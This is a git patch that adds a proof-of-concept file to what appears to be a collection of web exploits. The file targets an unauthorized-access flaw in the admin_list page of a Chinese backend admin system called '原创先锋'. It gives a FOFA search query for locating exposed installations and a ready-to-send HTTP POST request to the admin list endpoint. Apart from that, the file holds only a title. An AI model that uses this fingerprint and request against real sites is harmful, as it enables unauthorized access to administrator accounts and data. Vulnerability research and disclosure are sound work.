From d3ffabf7a0e7a5f67e2d4547951906cfe40c9d0a Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Wed, 11 Jun 2025 15:24:53 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=8E=9F=E5=88=9B=E5=85=88=E9=94=8B?= =?UTF-8?q?=E5=90=8E=E5=8F=B0=E7=AE=A1=E7=90=86admin=5Flist=E5=AD=98?= =?UTF-8?q?=E5=9C=A8=E6=9C=AA=E6=8E=88=E6=9D=83=E8=AE=BF=E9=97=AE.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../原创先锋后台管理admin_list存在未授权访问.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 wpoc/原创先锋后台管理/原创先锋后台管理admin_list存在未授权访问.md diff --git a/wpoc/原创先锋后台管理/原创先锋后台管理admin_list存在未授权访问.md b/wpoc/原创先锋后台管理/原创先锋后台管理admin_list存在未授权访问.md new file mode 100644 index 0000000..6b1c6c8 --- /dev/null +++ b/wpoc/原创先锋后台管理/原创先锋后台管理admin_list存在未授权访问.md @@ -0,0 +1,16 @@ +# 原创先锋后台管理admin_list存在未授权访问 + +# fofa +``` +body="https://www.bjycxf.com" +``` + +# poc +```javasrcipt +POST /admin/admin/admin_list.html HTTP/1.1 +Host: +Content-Type: application/json +Accept-Encoding: gzip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3 +Transfer-Encoding: chunked +```